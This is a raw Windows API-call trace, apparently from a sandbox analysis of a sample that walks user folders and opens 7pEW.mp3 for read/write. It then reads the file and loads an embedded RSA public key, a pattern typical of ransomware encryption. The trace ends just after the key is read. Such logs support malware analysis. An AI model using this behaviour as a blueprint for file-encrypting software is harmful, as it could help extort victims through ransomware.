[0186.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.874] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Local Settings\\") returned="Local Settings\\" [0186.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0186.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.874] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0186.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.875] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0186.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.875] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0186.875] PathFindFileNameW (pszPath="") returned="" [0186.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.875] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Local Settings\\*" (normalized: "c:\\users\\keecfmwgj\\local settings\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0186.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0186.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0186.877] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0186.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0186.877] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0186.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0186.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0186.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.905] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0186.905] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0186.906] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0186.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.906] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0186.906] PathFindFileNameW (pszPath="") returned="" [0186.906] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\*" (normalized: "c:\\users\\keecfmwgj\\music\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98b65310, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98b65310, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0186.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.907] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98b65310, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98b65310, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.907] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17112530, ftCreationTime.dwHighDateTime=0x1d8a625, ftLastAccessTime.dwLowDateTime=0x18f9190, ftLastAccessTime.dwHighDateTime=0x1d8a645, ftLastWriteTime.dwLowDateTime=0x18f9190, ftLastWriteTime.dwHighDateTime=0x1d8a645, nFileSizeHigh=0x0, nFileSizeLow=0x175ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7pEW.mp3", cAlternateFileName="")) returned 1 [0186.907] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\7pEW.mp3") returned=".mp3" [0186.913] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\7pEW.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\7pew.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0186.914] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=95694) returned 1 [0186.914] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0186.920] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x175a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.920] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0186.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.922] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.923] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x175ce, lpOverlapped=0x0) returned 1 [0186.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0186.924] lstrlenA (lpString="-----BEGIN PUBLIC 